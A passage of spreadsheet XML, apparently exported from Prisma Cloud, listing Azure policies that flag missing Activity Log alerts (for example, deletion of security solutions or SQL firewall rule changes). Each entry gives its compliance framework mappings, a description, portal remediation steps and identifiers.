      </c>
      <c r="H21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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2156" t="inlineStr">
        <is>
          <t>azure-activity-log</t>
        </is>
      </c>
      <c r="K2156" t="inlineStr">
        <is>
          <t>Azure Activity log alert for Delete security solution does not exist</t>
        </is>
      </c>
      <c r="L2156" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2156" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2156" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2156" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2156" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2156" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2156" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2156" t="inlineStr"/>
      <c r="T2156" t="b">
        <v>0</v>
      </c>
      <c r="U2156" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2156" t="inlineStr">
        <is>
          <t>azure-activity-log-alerts</t>
        </is>
      </c>
      <c r="W2156" t="inlineStr">
        <is>
          <t>This policy identifies the Azure accounts in which activity log alert for Delete security solution does not exist. Creating an activity log alert for Delete security solution gives insight into changes to the active security solutions and may reduce the time it takes to detect suspicious activity.</t>
        </is>
      </c>
      <c r="X2156" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Click on Monitor (Left Panel)
3. Select 'Alerts'
4. Click on Create &gt; Alert rule
5. In 'Create an alert rule' page, choose the Scope as your Subscription and under the CONDITION section, choose 'Delete Security Solutions (Microsoft.Security/securitySolutions)' and Other fields you can set based on your custom settings.
6. Click on Create</t>
        </is>
      </c>
      <c r="Y2156" t="inlineStr"/>
      <c r="Z2156"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Microsoft.Security/securitySolutions/delete" as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2156" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2156" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2156" t="inlineStr">
        <is>
          <t>PC-AZR-MON-495</t>
        </is>
      </c>
      <c r="AD2156" t="b">
        <v>1</v>
      </c>
      <c r="AE2156" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2156" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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6" t="inlineStr">
        <is>
          <t>eeb1b73a-759c-404b-9f53-507601e3d82b</t>
        </is>
      </c>
      <c r="AI2156" t="inlineStr">
        <is>
          <t>89ed9f97-2b15-4564-a00d-f62a41215f38</t>
        </is>
      </c>
      <c r="AJ2156" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2156" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2157">
      <c r="A2157" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, CIS v1.2.0 (Azure), MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, Fedramp (Moderate), CSA CCM v.4.0.6, PCI DSS v4.0, Australian Energy Sector Cyber Security Framework (AESCSF), CIS v2.0.0 (Azure) Level 1, Azure Security Benchmark (v2), Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v3.2.1, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, CIS v1.3.1 (Azure), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, CIS v2.1.0 (Azure) Level 1, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Copy of CIS v1.2.0 (Azure), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27017:2015, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, testazure,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ISO/IEC 27002:2013, CIS Controls v8.1, Azure Security Benchmark (v3), RBI Baseline Cyber Security and Resilience Requirements, Copy of Azure Security Benchmark (v3), kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Fedramp (Low), NIST SP 800-171 Revision 3, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, Fedramp (Low), Azure Security Benchmark (v3), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), MTSBv2_Azure, CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1,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CIS v1.3.0 (Azure), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CSA CCM v.4.0.6, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, NIST CSF, CIS v1.4.0 (Azure), Fedramp (Moderate), NIST CSF, ITSG-33,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PCI DSS v4.0, CIS v1.1 (Azure), Matt's ATT&amp;ACK, Copy of Azure Security Benchmark (v3), ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, TX-RAMP Level 1, NIST SP 800-172, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1, CIS v1.5.0 (Azure) - Level 1</t>
        </is>
      </c>
      <c r="B2157" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2157" s="2" t="inlineStr"/>
      <c r="D2157" t="inlineStr"/>
      <c r="E2157" t="inlineStr"/>
      <c r="F2157" t="inlineStr"/>
      <c r="G2157" t="b">
        <v>0</v>
      </c>
      <c r="H21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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2157" t="inlineStr">
        <is>
          <t>azure-activity-log</t>
        </is>
      </c>
      <c r="K2157" t="inlineStr">
        <is>
          <t>Azure Activity log alert for Create or update SQL server firewall rule does not exist</t>
        </is>
      </c>
      <c r="L2157" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2157" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2157" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2157" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2157" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2157" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2157" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2157" t="inlineStr"/>
      <c r="T2157" t="b">
        <v>0</v>
      </c>
      <c r="U2157" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2157" t="inlineStr">
        <is>
          <t>azure-activity-log-alerts</t>
        </is>
      </c>
      <c r="W2157" t="inlineStr">
        <is>
          <t>This policy identifies the Azure accounts in which activity log alert for Create or update SQL server firewall rule does not exist. Creating an activity log alert for Create or update SQL server firewall rule gives insight into SQL server firewall rule access changes and may reduce the time it takes to detect suspicious activity.</t>
        </is>
      </c>
      <c r="X2157" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Click on Monitor (Left Panel)
3. Select 'Alerts'
4. Click on Create &gt; Alert rule
5. In 'Create an alert rule' page, choose the Scope as your Subscription and under the CONDITION section, choose 'Create/Update server firewall rule (Microsoft.Sql/servers/firewallRules)' and Other fields you can set based on your custom settings.
6. Click on Create</t>
        </is>
      </c>
      <c r="Y2157" t="inlineStr"/>
      <c r="Z2157"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Microsoft.Sql/servers/firewallRules/write" as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2157" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2157" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2157" t="inlineStr">
        <is>
          <t>PC-AZR-MON-490</t>
        </is>
      </c>
      <c r="AD2157" t="b">
        <v>1</v>
      </c>
      <c r="AE2157" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2157" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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7" t="inlineStr">
        <is>
          <t>15cd19d3-e05e-4d13-b692-c72ea3f986af</t>
        </is>
      </c>
      <c r="AI2157" t="inlineStr">
        <is>
          <t>188d9e7e-39ec-4fc0-9af5-a9d0190b8c72</t>
        </is>
      </c>
      <c r="AJ2157" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2157" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2158">
      <c r="A2158" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), jneytchev-fedramp-low, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CIS v2.1.0 (Azure) Level 1, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MLPS 2.0 (Level 2), Fedramp (Moderate), CSA CCM v.4.0.6, PCI DSS v4.0, Australian Energy Sector Cyber Security Framework (AESCSF), Azure Security Benchmark (v2), PCI DSS v3.2.1, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, testazure, ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, CIS v1.5.0 (Azure) - Level 1, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27017:2015, NIST 800-53 Rev 5, CIS v1.3.1 (Azure), CIS v1.4.0 (Azure),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CIS v2.0.0 (Azure) Level 1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST 800-53 Rev4, ISO/IEC 27002:2013, CIS Controls v8.1, Azure Security Benchmark (v3), RBI Baseline Cyber Security and Resilience Requirements, Copy of Azure Security Benchmark (v3), kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Fedramp (Low), NIST SP 800-171 Revision 3, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, Fedramp (Low), CIS v1.3.0 (Azure), Azure Security Benchmark (v3), Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ACSC Information Security Manual (ISM), NIST 800-53 Rev4, Copy of CIS v1.2.0 (Azure), CRI Profile v2.0, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CIS v1.1 (Azure),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NIST CSF, Fedramp (Moderate), NIST CSF, ITSG-33, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, MTSBv2_Azure,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PCI DSS v4.0, Matt's ATT&amp;ACK, Copy of Azure Security Benchmark (v3), ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, CIS v1.2.0 (Azure), TX-RAMP Level 1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2158" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2158" s="2" t="inlineStr"/>
      <c r="D2158" t="inlineStr"/>
      <c r="E2158" t="inlineStr"/>
      <c r="F2158" t="inlineStr"/>
      <c r="G2158" t="b">
        <v>0</v>
      </c>
      <c r="H21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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2158" t="inlineStr">
        <is>
          <t>azure-activity-log</t>
        </is>
      </c>
      <c r="K2158" t="inlineStr">
        <is>
          <t>Azure Activity log alert for Create policy assignment does not exist</t>
        </is>
      </c>
      <c r="L2158" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2158" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2158" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2158" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2158" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2158" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2158" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2158" t="inlineStr"/>
      <c r="T2158" t="b">
        <v>0</v>
      </c>
      <c r="U2158" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2158" t="inlineStr">
        <is>
          <t>azure-activity-log-alerts</t>
        </is>
      </c>
      <c r="W2158" t="inlineStr">
        <is>
          <t>This policy identifies the Azure accounts in which activity log alert for Create policy assignment does not exist. Creating an activity log alert for Create policy assignment gives insight into changes done in azure policy - assignments and may reduce the time it takes to detect unsolicited changes.</t>
        </is>
      </c>
      <c r="X2158" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Click on Monitor (Left Panel)
3. Select 'Alerts'
4. Click on Create &gt; Alert rule
5. In 'Create an alert rule' page, choose the Scope as your Subscription and under the CONDITION section, choose 'Create policy assignment (Microsoft.Authorization/policyAssignments)' and Other fields you can set based on your custom settings.
6. Click on Create</t>
        </is>
      </c>
      <c r="Y2158" t="inlineStr"/>
      <c r="Z2158"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Microsoft.Authorization/policyAssignments/write" as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2158" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2158" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2158" t="inlineStr">
        <is>
          <t>PC-AZR-MON-489</t>
        </is>
      </c>
      <c r="AD2158" t="b">
        <v>1</v>
      </c>
      <c r="AE2158" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2158" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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8" t="inlineStr">
        <is>
          <t>3824beaa-6228-4c90-9fd8-3441251183ba</t>
        </is>
      </c>
      <c r="AI2158" t="inlineStr">
        <is>
          <t>69ab9f3a-7631-4c8f-982e-e2da7b18967e</t>
        </is>
      </c>
      <c r="AJ2158" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2158" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2159">
      <c r="A2159" t="inlineStr">
        <is>
          <t>jneytchev-fedramp-low, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, Fedramp (Moderate), CSA CCM v.4.0.6, Australian Energy Sector Cyber Security Framework (AESCSF), PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, testazure, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27017:2015, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013,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PCI DSS v4.0,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HITRUST CSF v.11.2.0, Fedramp (Low), NIST SP 800-171 Revision 3, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, Fedramp (Low), Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1,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CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CSA CCM v.4.0.6, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, NIST CSF, Fedramp (Moderate), NIST CSF,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CIS v1.1 (Azure), Matt's ATT&amp;ACK, ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2159" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2159" s="2" t="inlineStr"/>
      <c r="D2159" t="inlineStr"/>
      <c r="E2159" t="inlineStr"/>
      <c r="F2159" t="inlineStr"/>
      <c r="G2159" t="b">
        <v>0</v>
      </c>
      <c r="H21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59" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2159" t="inlineStr">
        <is>
          <t>azure-activity-log</t>
        </is>
      </c>
      <c r="K2159" t="inlineStr">
        <is>
          <t>Azure Activity log alert for Update security policy does not exist</t>
        </is>
      </c>
      <c r="L2159" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2159" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2159" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2159" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2159" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2159" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2159" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2159" t="inlineStr"/>
      <c r="T2159" t="b">
        <v>0</v>
      </c>
      <c r="U2159" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2159" t="inlineStr">
        <is>
          <t>azure-activity-log-alerts</t>
        </is>
      </c>
      <c r="W2159" t="inlineStr">
        <is>
          <t>This policy identifies the Azure accounts in which activity log alert for Update security policy does not exist. Creating an activity log alert for Update security policy gives insight into changes to security policy and may reduce the time it takes to detect suspicious activity.</t>
        </is>
      </c>
      <c r="X2159" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Click on Monitor (Left Panel)
3. Select 'Alerts'
4. Click on Create &gt; Alert rule
5. In 'Create an alert rule' page, choose the Scope as your Subscription and under the CONDITION section, choose 'Update security policy (Microsoft.Security/policies)' and Other fields you can set based on your custom settings.
6. Click on Create</t>
        </is>
      </c>
      <c r="Y2159" t="inlineStr"/>
      <c r="Z2159"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Microsoft.Security/policies/write" as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2159" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2159" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2159" t="inlineStr">
        <is>
          <t>PC-AZR-MON-491</t>
        </is>
      </c>
      <c r="AD2159" t="b">
        <v>1</v>
      </c>
      <c r="AE2159" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2159" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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59" t="inlineStr">
        <is>
          <t>699b7a02-4e83-4be4-aaf2-dca237ee16dc</t>
        </is>
      </c>
      <c r="AI2159" t="inlineStr">
        <is>
          <t>a09aab0c-8247-4cb9-b256-35678a096c7b</t>
        </is>
      </c>
      <c r="AJ2159" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2159" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2160">
      <c r="A2160" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, SOC 2, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS v2.0.0 (Azure) Level 1, CIS v2.1.0 (Azure) Level 1, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2160" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2160" s="2" t="inlineStr"/>
      <c r="D2160" t="inlineStr"/>
      <c r="E2160" t="inlineStr"/>
      <c r="F2160" t="inlineStr"/>
      <c r="G2160" t="b">
        <v>1</v>
      </c>
      <c r="H21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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2160" t="inlineStr">
        <is>
          <t>azure-activity-log</t>
        </is>
      </c>
      <c r="K2160" t="inlineStr">
        <is>
          <t>Azure Activity log alert for Delete public IP address rule does not exist</t>
        </is>
      </c>
      <c r="L2160" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2160" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2160" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2160" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2160" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2160" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R2160" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S2160" t="inlineStr"/>
      <c r="T2160" t="b">
        <v>0</v>
      </c>
      <c r="U2160" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2160" t="inlineStr">
        <is>
          <t>azure-activity-log-alerts</t>
        </is>
      </c>
      <c r="W2160" t="inlineStr">
        <is>
          <t>This policy identifies the Azure accounts in which activity log alert for Delete public IP address rule does not exist.
Creating an activity log alert for Delete public IP address rule gives insight into network rule access changes and may reduce the time it takes to detect suspicious activity. By enabling this monitoring, you get alerts whenever any deletions are made to public IP addresses rules.
As a best practice, it is recommended to have an activity log alert for Delete public IP address rule to enhance network security monitoring and detect suspicious activities.</t>
        </is>
      </c>
      <c r="X2160" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Click on Monitor (Left Panel)
3. Select 'Alerts'
4. Click on Create &gt; Alert rule
5. In 'Create an alert rule' page, choose the Scope as your Subscription and under the CONDITION section, choose 'Delete Public Ip Address (Public Ip Address)' and Other fields you can set based on your custom settings.
6. Click on Create</t>
        </is>
      </c>
      <c r="Y2160" t="inlineStr"/>
      <c r="Z2160"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Microsoft.Network/publicIPAddresses/delete" as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2160" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2160" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2160" t="inlineStr">
        <is>
          <t>PC-AZR-MON-1179</t>
        </is>
      </c>
      <c r="AD2160" t="b">
        <v>1</v>
      </c>
      <c r="AE2160" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2160" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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0" t="inlineStr">
        <is>
          <t>bb7ba68b-46b0-4763-8d62-6ade67320160</t>
        </is>
      </c>
      <c r="AI2160" t="inlineStr">
        <is>
          <t>82f3e2a2-0ddf-43a8-bf35-d806a3096c13</t>
        </is>
      </c>
      <c r="AJ2160" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2160" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2161">
      <c r="A2161" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, Fedramp (Moderate), CSA CCM v.4.0.6, PCI DSS v4.0, Australian Energy Sector Cyber Security Framework (AESCSF), Azure Security Benchmark (v2), PCI DSS v3.2.1, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ACSC Information Security Manual (ISM), CIS v1.2.0 (Azure), APRA (CPS 